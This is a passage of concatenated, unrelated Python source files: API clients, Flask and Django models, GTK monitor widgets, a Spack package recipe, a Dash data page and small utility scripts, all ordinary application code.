accessing Green Mountain Power API""" def __init__(self, account_number: int, username: str, password: str): self.account_number = account_number def token_updater(token): self.session.token = token self.session = requests_oauthlib.OAuth2Session( client=oauthlib.oauth2.LegacyApplicationClient(client_id=_CLIENT_ID), auto_refresh_url=f"{_BASE_URL}/api/v2/applications/token", token_updater=token_updater, ) token = self.session.fetch_token( token_url=f"{_BASE_URL}/api/v2/applications/token", username=username, password=password, include_client_id=True, force_querystring=True, ) def get_usage( self, precision: UsagePrecision, start_time: datetime.datetime, end_time: datetime.datetime, ): response = self.session.get( url=f"{_BASE_URL}/api/v2/usage/{self.account_number}/{precision.value}", params={ "startDate": start_time.astimezone().isoformat(), "endDate": end_time.astimezone().isoformat(), }, ) if response.status_code == 400: raise exceptions.BadRequestException(response.json()["message"]) if response.status_code == 401: raise exceptions.UnauthorizedException(response.json()["message"]) data = response.json() return [ usage for interval in data["intervals"] for value in interval["values"] for usage in Usage.try_parse_data(value) ] raiden/api/v1/resources.py from flask import Blueprint from flask_restful import Resource from webargs.flaskparser import use_kwargs from raiden.api.v1.encoding import ( BlockchainEventsRequestSchema, ChannelPatchSchema, ChannelPutSchema, ChannelLuminoGetSchema, ChannelPutLuminoSchema, ConnectionsConnectSchema, ConnectionsLeaveSchema, PaymentSchema, RaidenEventsRequestSchema, DashboardLuminoSchema, RaidenEventsRequestSchemaV2, SearchLuminoRequestSchema, TokenActionSchema, TokenActionRequestSchema ) from raiden.utils import typing def create_blueprint(): # Take a look at this SO question on hints how to organize versioned # API with flask: # http://stackoverflow.com/questions/28795561/support-multiple-api-versions-in-flask#28797512 return Blueprint("v1_resources", 
__name__) class BaseResource(Resource): def __init__(self, rest_api_object, **kwargs): super().__init__(**kwargs) self.rest_api = rest_api_object class AddressResource(BaseResource): def get(self): return self.rest_api.get_our_address() class ChannelsResource(BaseResource): put_schema = ChannelPutSchema def get(self): """ this translates to 'get all channels the node is connected with' """ return self.rest_api.get_channel_list( self.rest_api.raiden_api.raiden.default_registry.address ) @use_kwargs(put_schema, locations=("json",)) def put(self, **kwargs): return self.rest_api.open( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, **kwargs ) class ChannelsResourceLumino(BaseResource): get_schema = ChannelLuminoGetSchema put_schema = ChannelPutLuminoSchema @use_kwargs(get_schema, locations=('query',)) def get(self, token_addresses: typing.ByteString = None): """ this translates to 'get the channels for the tokens and check if they can join' """ return self.rest_api.get_channel_list_for_tokens( self.rest_api.raiden_api.raiden.default_registry.address, token_addresses=token_addresses ) @use_kwargs(put_schema, locations=("json",)) def put(self, **kwargs): return self.rest_api.open_lumino( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, **kwargs ) class ChannelsResourceByTokenAddress(BaseResource): def get(self, **kwargs): """ this translates to 'get all channels the node is connected to for the given token address' """ return self.rest_api.get_channel_list( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, **kwargs ) class ChannelsResourceByTokenAndPartnerAddress(BaseResource): patch_schema = ChannelPatchSchema @use_kwargs(patch_schema, locations=("json",)) def patch(self, **kwargs): return self.rest_api.patch_channel( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, **kwargs ) def get(self, **kwargs): return self.rest_api.get_channel( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, **kwargs ) class TokensResource(BaseResource): def get(self): """ this translates to 'get all token addresses we have channels open for' """ return self.rest_api.get_tokens_list( self.rest_api.raiden_api.raiden.default_registry.address ) class PartnersResourceByTokenAddress(BaseResource): def get(self, token_address): return self.rest_api.get_partners_by_token( self.rest_api.raiden_api.raiden.default_registry.address, token_address ) class BlockchainEventsNetworkResource(BaseResource): get_schema = BlockchainEventsRequestSchema() @use_kwargs(get_schema, locations=("query",)) def get(self, from_block, to_block): from_block = from_block or self.rest_api.raiden_api.raiden.query_start_block to_block = to_block or "latest" return self.rest_api.get_blockchain_events_network( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, from_block=from_block, to_block=to_block, ) class BlockchainEventsTokenResource(BaseResource): get_schema = BlockchainEventsRequestSchema() @use_kwargs(get_schema, locations=("query",)) def get(self, token_address, from_block, to_block): from_block = from_block or self.rest_api.raiden_api.raiden.query_start_block to_block = to_block or "latest" return self.rest_api.get_blockchain_events_token_network( token_address=token_address, from_block=from_block, to_block=to_block ) class ChannelBlockchainEventsResource(BaseResource): get_schema = BlockchainEventsRequestSchema() @use_kwargs(get_schema, locations=("query",)) def get(self, token_address, 
partner_address=None, from_block=None, to_block=None): from_block = from_block or self.rest_api.raiden_api.raiden.query_start_block to_block = to_block or "latest" return self.rest_api.get_blockchain_events_channel( token_address=token_address, partner_address=partner_address, from_block=from_block, to_block=to_block, ) class RaidenInternalEventsResource(BaseResource): get_schema = RaidenEventsRequestSchema() @use_kwargs(get_schema, locations=("query",)) def get(self, limit=None, offset=None): return self.rest_api.get_raiden_internal_events_with_timestamps(limit=limit, offset=offset) class RegisterTokenResource(BaseResource): def get(self, token_address): return self.rest_api.get_token_network_for_token( self.rest_api.raiden_api.raiden.default_registry.address, token_address ) def put(self, token_address): return self.rest_api.register_token( self.rest_api.raiden_api.raiden.default_registry.address, token_address ) class ConnectionsResource(BaseResource): put_schema = ConnectionsConnectSchema() delete_schema = ConnectionsLeaveSchema() @use_kwargs(put_schema) def put(self, token_address, funds, initial_channel_target, joinable_funds_target): return self.rest_api.connect( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, token_address=token_address, funds=funds, initial_channel_target=initial_channel_target, joinable_funds_target=joinable_funds_target, ) @use_kwargs(delete_schema, locations=("json",)) def delete(self, token_address): return self.rest_api.leave( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, token_address=token_address, ) class ConnectionsInfoResource(BaseResource): def get(self): return self.rest_api.get_connection_managers_info( self.rest_api.raiden_api.raiden.default_registry.address ) class PaymentResource(BaseResource): post_schema = PaymentSchema(only=("amount", "identifier", "secret", "secret_hash")) get_schema = RaidenEventsRequestSchema() @use_kwargs(get_schema, locations=("query",)) def get( self, token_address: typing.TokenAddress = None, target_address: typing.Address = None, limit: int = None, offset: int = None, ): return self.rest_api.get_raiden_events_payment_history_with_timestamps( token_address=token_address, target_address=target_address, limit=limit, offset=offset ) @use_kwargs(post_schema, locations=("json",)) def post( self, token_address: typing.TokenAddress, target_address: typing.TargetAddress, amount: typing.PaymentAmount, identifier: typing.PaymentID, secret: typing.Secret, secret_hash: typing.SecretHash, ): return self.rest_api.initiate_payment( registry_address=self.rest_api.raiden_api.raiden.default_registry.address, token_address=token_address, target_address=target_address, amount=amount, identifier=identifier, secret=secret, secret_hash=secret_hash, ) class PendingTransfersResource(BaseResource): def get(self): return self.rest_api.get_pending_transfers() class PendingTransfersResourceByTokenAddress(BaseResource): def get(self, token_address): return self.rest_api.get_pending_transfers(token_address) class PendingTransfersResourceByTokenAndPartnerAddress(BaseResource): def get(self, token_address, partner_address): return self.rest_api.get_pending_transfers(token_address, partner_address) class DashboardResource(BaseResource): get_schema = DashboardLuminoSchema() @use_kwargs(get_schema, locations=('query',)) def get( self, graph_from_date: typing.LogTime = None, graph_to_date: typing.LogTime = None, table_limit: int = None ): return self.rest_api.get_dashboard_data( 
self.rest_api.raiden_api.raiden.default_registry.address, graph_from_date=graph_from_date, graph_to_date=graph_to_date, table_limit=table_limit ) class PaymentResourceLumino(BaseResource): get_schema = RaidenEventsRequestSchemaV2() @use_kwargs(get_schema, locations=('query',)) def get( self, token_network_identifier: typing.Address = None, initiator_address: typing.Address = None, target_address: typing.Address = None, from_date: typing.LogTime = None, to_date: typing.LogTime = None, event_type: int = None, limit: int = None, offset: int = None, ): return self.rest_api.get_raiden_events_payment_history_with_timestamps_v2( token_network_identifier=token_network_identifier, initiator_address=initiator_address, target_address=target_address, from_date=from_date, to_date=to_date, event_type=event_type, limit=limit, offset=offset, ) class NetworkResource(BaseResource): def get(self, token_network_address): return self.rest_api.get_network_graph(token_network_address) class SearchLuminoResource(BaseResource): get_schema = SearchLuminoRequestSchema() @use_kwargs(get_schema, locations=('query',)) def get( self, query: typing.ByteString = None, only_receivers: bool = None ): return self.rest_api.search_lumino( self.rest_api.raiden_api.raiden.default_registry.address, query=query, only_receivers=only_receivers ) class TokenActionResource(BaseResource): get_schema = TokenActionRequestSchema() post_schema = TokenActionSchema() @use_kwargs(get_schema, locations=("query",)) def get( self, token: typing.ByteString = None ): return self.rest_api.get_token_action( token=token ) @use_kwargs(post_schema, locations=("json",)) def post( self, action: typing.ByteString, ): return self.rest_api.write_token_action(action) name = 'pyhighlight' import matplotlib.pyplot as pyplot import matplotlib.patches as patches class InvalidImagePathError(Exception): def __init__(self, message): super().__init__(message) class EmptyPointsError(Exception): def __init__(self, message): super().__init__(message) class InvalidTransparencyValueError(Exception): def __init__(self, message): super().__init__(message) class pyhighlight: def __init__(self, image_path): try: image = pyplot.imread(image_path) height, width, nbands = image.shape fig_size = width / float(80), height / float(80) figure = pyplot.figure(figsize=fig_size) self.final_image = figure.add_axes([0, 0, 1, 1]) self.final_image.axis('off') self.final_image.imshow(image, interpolation='nearest') except FileNotFoundError: raise InvalidImagePathError('Could not open ' + image_path) def highlight(self, points, color='blue', transparency=0.3): if not points or points == []: raise EmptyPointsError('A valid array of points must be provided') if transparency > 1 or transparency < 0: raise InvalidTransparencyValueError('Transparency must be a value between 0 and 1') shape = pyplot.Polygon(points, closed=True, alpha=transparency, fill=True, color=color) self.final_image.add_patch(shape) def save(self, path='pyhighlight-output.png', transparent=True): generated_image = pyplot.gcf() pyplot.draw() generated_image.savefig(path, dpi=80, transparent=transparent) from django.db.models import CharField, ForeignKey, CASCADE from apps.basics.op_drf.models import CoreModel class SysFiles(CoreModel): dir_name = CharField(max_length=32, verbose_name='磁盘路径') sys_type_name = CharField(max_length=400, verbose_name='系统文件类型') type_name = CharField(max_length=32, verbose_name='盘符类型') total = CharField(max_length=32, verbose_name='磁盘总大小(KB)') disk_sys = CharField(max_length=32, 
verbose_name='已使用大小(KB)') monitor = ForeignKey(to='monitor.Monitor', on_delete=CASCADE, verbose_name="关联服务器监控信息", db_constraint=False) class Meta: verbose_name = '系统磁盘' verbose_name_plural = verbose_name def __str__(self): return f"{self.creator and self.creator.name}" nitinkumar30/Programming-Basics import random import time from os import system def main(): while True: system('cls') print("[PASSWORD GENERATOR]") pwdtype = input(''' (1) xxx-xxx-xxx type (2) random type ENTER: ''') if pwdtype == '1': passwd = gen_typeone() print("\n[YOUR PASSWORD]") print(f"> {passwd}") input("\n[PRESS ENTER]") elif pwdtype == '2': passwd = gen_typetwo() print("\n[YOUR PASSWORD]") print(f"> {passwd}") input("\n[PRESS ENTER]") else: continue def gen_typeone(): alphabet = 'abcdefghijklmnopqrstuvwxyz' passwd = "-".join(("".join(random.sample(alphabet,k=3))) for _ in range(3)) return passwd def gen_typetwo(): alphabet = 'abcdefghijklmnopqrstuvwxyz' numbers = '1234567890' symbols = '@$*-_#+' passwd = "" numsym = random.choice([1,2,3]) numnum = random.choice([3,4,5]) numalpha = 13 - numsym - numnum passwd = random.choices(alphabet, k=numalpha) + random.choices(numbers, k=numnum) + random.choices(symbols, k=numsym) for _ in range(3): random.shuffle(passwd) passwd = "".join(passwd) return passwd if __name__ == "__main__": main() from __future__ import print_function import socket from microio import * from utils import * def handler(csock): try: while True: yield csock, POLLREAD data = csock.recv(65536) if not data: raise IOError('Connection closed') while data: yield csock, POLLWRITE sent = csock.send(data) if not sent: raise IOError('Connection closed') data = data[sent:] except IOError: yield csock, None def server(address): sock = listen(address) try: while True: err = yield sock, POLLREAD | POLLERROR if err & POLLERROR: raise IOError() csock, addr = sock.accept() yield spawn(handler(csock)) except IOError: yield sock, None def main(): try: loop(server(('127.0.0.1', 25000))) except KeyboardInterrupt: pass if __name__ == '__main__': main() buildings = 1 math = 1 science = 1 garedening = 1 biology = 1 nature = 1 planning = 1 culture = 1 politics = 1 social = 1 people = 1 speech = 1 language = 1 engineering = 1 computer = 1 graphics = 1 programming = 1 Systems = 1 development = 1 animation = 1 communication = 1 media = 1 design = 1 aesthetics = 1 art = 1 chemistry = 1 physics = 1 anamoty = 1 photography = 1 history = 1 painting = 1 drawing = 1 psychology = 1 array = [buildings , math, science , garedening , biology , nature , planning , culture , politics , social , people , speech, language, engineering, computer, graphics , programming, Systems , development , animation , communication , media , design , aesthetics , art , chemistry , physics , anamoty , photography , history , painting , drawing , psychology ] print(len(array)) def printZeros(x): total = range(33-x) for i in total: print(0,end=',') #printZeros(5) import random def printRandom(): total = range(33) for i in total: print(random.randint(0,5), end=",") #printRandom() import json with open('answers.json') as f: data = json.load(f) keys = list(data[0]) for q in data: print(f'{[q["question"]]}:{[q["answer"]]}') 10-100 # coding: utf-8 """ Yapily API To access endpoints that require authentication, use your application key and secret created in the Dashboard (https://dashboard.yapily.com) # noqa: E501 The version of the OpenAPI document: 1.154.0 Generated by: https://openapi-generator.tech """ import pprint import re # noqa: F401 import six from 
yapily.configuration import Configuration class PeriodicPaymentRequest(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ openapi_types = { 'frequency': 'FrequencyRequest', 'number_of_payments': 'int', 'next_payment_date_time': 'datetime', 'next_payment_amount': 'Amount', 'final_payment_date_time': 'datetime', 'final_payment_amount': 'Amount' } attribute_map = { 'frequency': 'frequency', 'number_of_payments': 'numberOfPayments', 'next_payment_date_time': 'nextPaymentDateTime', 'next_payment_amount': 'nextPaymentAmount', 'final_payment_date_time': 'finalPaymentDateTime', 'final_payment_amount': 'finalPaymentAmount' } def __init__(self, frequency=None, number_of_payments=None, next_payment_date_time=None, next_payment_amount=None, final_payment_date_time=None, final_payment_amount=None, local_vars_configuration=None): # noqa: E501 """PeriodicPaymentRequest - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration() self.local_vars_configuration = local_vars_configuration self._frequency = None self._number_of_payments = None self._next_payment_date_time = None self._next_payment_amount = None self._final_payment_date_time = None self._final_payment_amount = None self.discriminator = None self.frequency = frequency if number_of_payments is not None: self.number_of_payments = number_of_payments if next_payment_date_time is not None: self.next_payment_date_time = next_payment_date_time if next_payment_amount is not None: self.next_payment_amount = next_payment_amount if final_payment_date_time is not None: self.final_payment_date_time = final_payment_date_time if final_payment_amount is not None: self.final_payment_amount = final_payment_amount @property def frequency(self): """Gets the frequency of this PeriodicPaymentRequest. # noqa: E501 :return: The frequency of this PeriodicPaymentRequest. # noqa: E501 :rtype: FrequencyRequest """ return self._frequency @frequency.setter def frequency(self, frequency): """Sets the frequency of this PeriodicPaymentRequest. :param frequency: The frequency of this PeriodicPaymentRequest. # noqa: E501 :type: FrequencyRequest """ if self.local_vars_configuration.client_side_validation and frequency is None: # noqa: E501 raise ValueError("Invalid value for `frequency`, must not be `None`") # noqa: E501 self._frequency = frequency @property def number_of_payments(self): """Gets the number_of_payments of this PeriodicPaymentRequest. # noqa: E501 :return: The number_of_payments of this PeriodicPaymentRequest. # noqa: E501 :rtype: int """ return self._number_of_payments @number_of_payments.setter def number_of_payments(self, number_of_payments): """Sets the number_of_payments of this PeriodicPaymentRequest. :param number_of_payments: The number_of_payments of this PeriodicPaymentRequest. # noqa: E501 :type: int """ self._number_of_payments = number_of_payments @property def next_payment_date_time(self): """Gets the next_payment_date_time of this PeriodicPaymentRequest. # noqa: E501 :return: The next_payment_date_time of this PeriodicPaymentRequest. 
# noqa: E501 :rtype: datetime """ return self._next_payment_date_time @next_payment_date_time.setter def next_payment_date_time(self, next_payment_date_time): """Sets the next_payment_date_time of this PeriodicPaymentRequest. :param next_payment_date_time: The next_payment_date_time of this PeriodicPaymentRequest. # noqa: E501 :type: datetime """ self._next_payment_date_time = next_payment_date_time @property def next_payment_amount(self): """Gets the next_payment_amount of this PeriodicPaymentRequest. # noqa: E501 :return: The next_payment_amount of this PeriodicPaymentRequest. # noqa: E501 :rtype: Amount """ return self._next_payment_amount @next_payment_amount.setter def next_payment_amount(self, next_payment_amount): """Sets the next_payment_amount of this PeriodicPaymentRequest. :param next_payment_amount: The next_payment_amount of this PeriodicPaymentRequest. # noqa: E501 :type: Amount """ self._next_payment_amount = next_payment_amount @property def final_payment_date_time(self): """Gets the final_payment_date_time of this PeriodicPaymentRequest. # noqa: E501 :return: The final_payment_date_time of this PeriodicPaymentRequest. # noqa: E501 :rtype: datetime """ return self._final_payment_date_time @final_payment_date_time.setter def final_payment_date_time(self, final_payment_date_time): """Sets the final_payment_date_time of this PeriodicPaymentRequest. :param final_payment_date_time: The final_payment_date_time of this PeriodicPaymentRequest. # noqa: E501 :type: datetime """ self._final_payment_date_time = final_payment_date_time @property def final_payment_amount(self): """Gets the final_payment_amount of this PeriodicPaymentRequest. # noqa: E501 :return: The final_payment_amount of this PeriodicPaymentRequest. # noqa: E501 :rtype: Amount """ return self._final_payment_amount @final_payment_amount.setter def final_payment_amount(self, final_payment_amount): """Sets the final_payment_amount of this PeriodicPaymentRequest. :param final_payment_amount: The final_payment_amount of this PeriodicPaymentRequest. 
# noqa: E501 :type: Amount """ self._final_payment_amount = final_payment_amount def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, PeriodicPaymentRequest): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, PeriodicPaymentRequest): return True return self.to_dict() != other.to_dict() michel4j/mxdc import logging import operator from gi.repository import Gtk, Pango, GLib from mxdc.devices.manager import BaseManager from mxdc.widgets import timer def value_class(val, warning, error): if (val < warning < error) or (val > warning > error): return "" elif (warning < val < error) or (warning > val > error): return "dev-warning" elif (warning < error < val) or (warning > error > val): return "dev-error" else: return "" class DeviceMonitor(object): def __init__(self, device, label, format='{:.3e}', signal='changed', warning=None, error=None): self.text = label self.device = device self.format = format self.warning = warning self.error = error self.device.connect(signal, self.on_signal) def on_signal(self, obj, *args): if isinstance(self.format, str): display_text = self.format.format(*args) elif callable(self.format): display_text = self.format(*args) else: display_text = args[0] self.text.set_text(display_text) style = self.text.get_style_context() if self.warning and self.error: style_class = value_class(args[0], self.warning, self.error) for name in ['dev-warning', 'dev-error']: if style_class == name: style.add_class(name) else: style.remove_class(name) class PropertyMonitor(object): def __init__(self, device, property, widget, format='{:.3e}', warning=None, error=None): self.widget = widget self.device = device self.property = property self.format = format self.warning = warning self.error = error self.device.connect('notify::{}'.format(self.property), self.on_value_changed) self.device.bind_property(self.property, self.widget, 'text', 0, self.transform) def transform(self, obj, value): return self.format.format(value) def on_value_changed(self, *args, **kwargs): if self.warning and self.error: value = self.device.get_property(self.property) style = self.widget.get_style_context() style_class = value_class(value, self.warning, self.error) for name in ['dev-warning', 'dev-error']: if style_class == name: style.add_class(name) else: style.remove_class(name) class ShutterSwitcher(object): def __init__(self, device, switch, reverse=False, openonly=False): self.device = device self.switch = switch self.reverse = reverse self.openonly = openonly self.dev_link = self.device.connect('changed', self.on_state_change) self.sw_link = self.switch.connect('notify::active', self.on_shutter_activated) def watch(self): self.switch.handler_unblock(self.sw_link) def 
unwatch(self): self.switch.handler_block(self.sw_link) def on_state_change(self, obj, state): self.unwatch() self.switch.set_state(operator.xor(state, self.reverse)) self.watch() def on_shutter_activated(self, obj, param): state = self.switch.get_active() if operator.xor(state, self.reverse): self.device.open() elif not self.openonly: self.device.close() class ScaleMonitor(object): def __init__(self, scale, device, minimum=0.0, maximum=100.0): self.scale = scale self.device = device self.minimum = minimum self.maximum = maximum self.in_progress = False self.adjustment = self.scale.get_adjustment() self.adjustment.connect('value-changed', self.on_value_set) self.device.connect('changed', self.on_update) def on_value_set(self, obj): if not self.in_progress: if hasattr(self.device, 'move_to'): self.device.move_to(self.adjustment.props.value) elif hasattr(self.device, 'set'): self.device.set(self.adjustment.props.value) def on_update(self, obj, val): self.in_progress = True self.adjustment.props.value = val self.in_progress = False class BoolMonitor(object): def __init__(self, device, entry, value_map, signal='changed', inverted=False): self.device = device self.entry = entry self.value_map = value_map self.inverted = inverted self.device.connect(signal, self.on_signal) def on_signal(self, obj, state): txt = self.value_map.get(state, str(state)) self.entry.set_text(txt) style = self.entry.get_style_context() if state == self.inverted: style.add_class('state-active') style.remove_class('state-inactive') else: style.remove_class('state-active') style.add_class('state-inactive') class ModeMonitor(object): MODE_MAP = { BaseManager.ModeType.MOUNT: 'mounting', BaseManager.ModeType.CENTER: 'centering', BaseManager.ModeType.COLLECT: 'collecting', BaseManager.ModeType.ALIGN: 'aligning', BaseManager.ModeType.UNKNOWN: 'unknown', } def __init__(self, device, entry, signal='changed'): self.device = device self.entry = entry self.value_map = self.MODE_MAP self.device.connect(signal, self.on_signal) def on_signal(self, obj, state): if state == BaseManager.ModeType.BUSY: self.entry.set_text('BUSY') else: value = self.value_map.get(state, 'unknown') self.entry.set_text(value.upper()) style = self.entry.get_style_context() for name in self.value_map.values(): style.remove_class(f'mode-{name}') style.add_class(f'mode-{value}') class AppNotifier(object): def __init__(self, label, revealer, button): self.label = label self.revealer = revealer self.close_button = button self.box = self.label.get_parent() self.close_button.connect('clicked', self.on_notifier_closed) self.timer_shown = False self.timer = timer.Timer() # self.box.pack_start(self.timer, False, False, 0) # self.box.show_all() def on_notifier_closed(self, button): self.close() def notify(self, message, level=Gtk.MessageType.INFO, important=False, duration=3, show_timer=False): """ Display an in-app notification. :param message: Text to display :param level: Gtk.MessageType :param duration: Duration too display message in seconds. 
Ignored if 'important' is True :param important: Boolean, if True, the message stays on until closed manually :param show_timer: Boolean, if True, a timer will be shown :return: """ if self.revealer.get_reveal_child(): self.revealer.set_reveal_child(False) self.label.set_text(message) if show_timer: self.timer.start(duration) self.box.pack_start(self.timer, False, False, 3) self.timer.show() self.timer_shown = True self.revealer.set_reveal_child(True) if not important: GLib.timeout_add(1000 * duration, self.close) def close(self): self.revealer.set_reveal_child(False) if self.timer_shown: self.box.remove(self.timer) self.timer_shown = False class GUIHandler(logging.Handler): def __init__(self, viewer): logging.Handler.__init__(self) self.viewer = viewer def emit(self, record): GLib.idle_add(self.viewer.add_text, self.format(record), record.levelno) class StatusMonitor(object): def __init__(self, widget, devices=()): self.devices = set() self.spinner = widget.spinner self.text = widget.status_lbl for dev in devices: self.add(dev) def add(self, *args): for device in args: self.devices.add(device) device.connect('message', self.on_message) device.connect('busy', self.check_busy) def on_message(self, device, message): """ Set the message directly if spinner is busy otherwise set to blank""" message = message if message else 'Busy ...' self.text.set_text(f'{device.name} - {message}') self.check_busy() def check_busy(self, *args, **kwargs): if any(dev.is_busy() for dev in self.devices): self.spinner.start() else: self.spinner.stop() self.text.set_text('') class LogMonitor(object): def __init__(self, log_box, size=5000, font='Monospace 8'): self.buffer_size = size self.scroll_win = log_box self.view = log_box.get_child() self.text_buffer = self.view.get_buffer() self.view.set_editable(False) pango_font = Pango.FontDescription(font) self.view.modify_font(pango_font) self.wrap_mode = Gtk.WrapMode.WORD self.prefix = '' color_chart = { logging.INFO: 'Black', logging.CRITICAL: '#d2413a', logging.DEBUG: '#3a7ca8', logging.ERROR: '#D2413A', logging.WARNING: '#e98b39', } self.tags = {} for key, v in list(color_chart.items()): self.tags[key] = self.text_buffer.create_tag(foreground=v) self.view.connect('size-allocate', self.content_changed) def content_changed(self, widget, event, data=None): adj = self.scroll_win.get_vadjustment() adj.set_value(adj.get_upper() - adj.get_page_size()) def set_prefix(self, txt): self.prefix = txt def clear(self): self.text_buffer.delete(self.text_buffer.get_start_iter(), self.text_buffer.get_end_iter()) def add_text(self, text, level=logging.INFO): linecount = self.text_buffer.get_line_count() if linecount > self.buffer_size: start_iter = self.text_buffer.get_start_iter() end_iter = self.text_buffer.get_start_iter() end_iter.forward_lines(10) self.text_buffer.delete(start_iter, end_iter) loc = self.text_buffer.get_end_iter() if level == logging.INFO: self.text_buffer.insert(loc, f"{self.prefix}{text}\n") else: tag = self.tags[level] self.text_buffer.insert_with_tags(loc, f"{self.prefix}{text}\n", tag) class Tuner(object): def __init__(self, tuner, tune_up_btn, tune_down_btn, reset_btn=None, repeat_interval=100): self.tuner = tuner self.tune_up_btn = tune_up_btn self.tune_down_btn = tune_down_btn self.reset_btn = reset_btn self.repeat_interval = repeat_interval self.tune_func = None self.tune_up_btn.connect('button-press-event', self.on_tune_up) self.tune_down_btn.connect('button-press-event', self.on_tune_down) self.tune_up_btn.connect('button-release-event', 
self.cancel_tuning) self.tune_down_btn.connect('button-release-event', self.cancel_tuning) if self.reset_btn: self.reset_btn.connect('clicked', lambda x: tuner.reset()) def repeat_tuning(self): if self.tune_func: self.tune_func() return True def on_tune_up(self, button, event): if event.button == 1: self.tune_func = self.tuner.tune_up self.tuner.tune_up() GLib.timeout_add(self.repeat_interval, self.repeat_tuning) def on_tune_down(self, button, event): if event.button == 1: self.tune_func = self.tuner.tune_down self.tuner.tune_down() GLib.timeout_add(self.repeat_interval, self.repeat_tuning) def cancel_tuning(self, *args, **kwargs): self.tune_func = None # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * # Only build certain parts of dwarf because the other ones break. dwarf_dirs = ['libdwarf', 'dwarfdump2'] class Libdwarf(Package): homepage = "http://www.prevanders.net/dwarf.html" url = "http://www.prevanders.net/libdwarf-20130729.tar.gz" list_url = homepage version(20130729, "64b42692e947d5180e162e46c689dfbf") version(20130207, 'foobarbaz') version(20111030, 'foobarbaz') version(20070703, 'foobarbaz') depends_on("libelf") def install(self, spec, prefix): touch(prefix.libdwarf) NHentaidesu/methods/doujinshi/comments.py1-10 from NHentaidesu import types from NHentaidesu.scaffold import Scaffold from datetime import datetime from typing import List class GetComments(Scaffold): async def get_comments(self, book_id: int) -> List["types.DoujinComments"]: result = await self.request_api(f"/gallery/{book_id}/comments") comments = types.List() for res in result: comment = types.DoujinComments._parse( self, id=res['id'], gallery_id=res['gallery_id'], user=types.GetUser._parse( self, id=res['poster']['id'], username=res['poster']['username'], slug=res['poster']['slug'], avatar=res['poster']['avatar_url'], is_superuser=res['poster']['is_superuser'], is_staff=res['poster']['is_staff'], ), post_date=datetime.fromtimestamp(res['post_date']), text=res['body'] ) comments.append(comment) return comments async def flag_comment(self, comment_id: int, reason: str) -> bool: await self.request_api( f"/comments/{comment_id}/flag", method="POST", json={'reason': reason} ) return True async def delete_comment(self, comment_id: int) -> bool: await self.request_api( f"/comments/{comment_id}/delete", method="POST" ) return True # DEPRECATED, NHENTAI USING RECAPTCHA # async def submit_comment(self, book_id: int, text: str): # result = await self.request_api( # f"/comments/{book_id}/delete", # method="POST", # data=text # ) # return result # Imports from 3rd party libraries import dash import dash_bootstrap_components as dbc import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output import plotly.express as px import pandas as pd # Imports from this application from app import app hd_r = pd.read_csv('assets/hd_renamed.csv') hd_r_thal_2_yes = hd_r[hd_r['thal_2'] == 1] hd_r_cp_0_yes = hd_r[hd_r['chest_pain_0'] == 1] hd_r_thal_3_yes = hd_r[hd_r['thal_3'] == 1] # fig = px.scatter(hd_r, x='cholestoral', y='thal_2', color='target', marginal_x='histogram') fig2 = px.scatter(hd_r_thal_2_yes, x='age', y='sex', color='target', marginal_x='histogram') fig3 = px.scatter(hd_r_cp_0_yes, x='age', y='sex', color='target', marginal_x='histogram') fig4 = px.scatter(hd_r_thal_3_yes, x='age', y='sex', color='target', 
marginal_x='histogram') # 1 column layout # https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout column1 = dbc.Col( [ dcc.Markdown( """ ## Insights Heart disease is the leading cause of death for men, women, and people of most racial and ethnic groups in the United States. One person dies every 37 seconds in the United States from cardiovascular disease. About 647,000 Americans die from heart disease each year—that's 1 in every 4 deaths. https://www.cdc.gov/heartdisease/facts.htm In my project I used features importance to find out which of them are more important in predicting a heart disease """ ), html.Img(src='assets/ThalliumStressTest.jpg', className='img-fluid'), dcc.Markdown( ''' From the feature importance and Eli5 permutation importance for RandomForestClassifier you can see that some of the features are more correlated to the target than the others. '''), html.Img(src='assets/feature_importance.png', className='img-fluid'), html.Img(src='assets/permutation_importance.png', className='img-fluid'), dcc.Markdown( ''' Positive results on Thallium stress test type 2 has a big impact on prediction the patients who have a heart disease. On the other hand Chest Pain type 0 and Thallium stress test type 3 have a more positive correlation with those patients who doesn't have a heart disease. '''), dcc.Markdown('#### Thallium stress test type 2 positive'), dcc.Graph(figure=fig2), dcc.Markdown( ''' You can interact with the plot to see the impact on those who have Thallium stress test type 2, Chest pain type 0 or Thallium stress test type 3 in correlation to the target. 1 = got a disease, 0 = doesn't have a disease. '''), dcc.Markdown('#### Chest Pain type 0 positive'), dcc.Graph(figure=fig3), dcc.Markdown('#### Thallium stress test type 3 positive'), dcc.Graph(figure=fig4), ], ) layout = dbc.Row([column1])social/apis.py from common import errors from libs.cache import rds from libs.http import render_json from social import logics from social.models import Swiped from social.permissions import has_perm from user.models import User def recommend(request): user = request.user rec_users = logics.recommend_users(user) users = [u.to_dict() for u in rec_users] return render_json(data=users) def like(request): user = request.user sid = request.POST.get('sid') if sid is None: return render_json(code=errors.SID_ERR) sid = int(sid) matched = 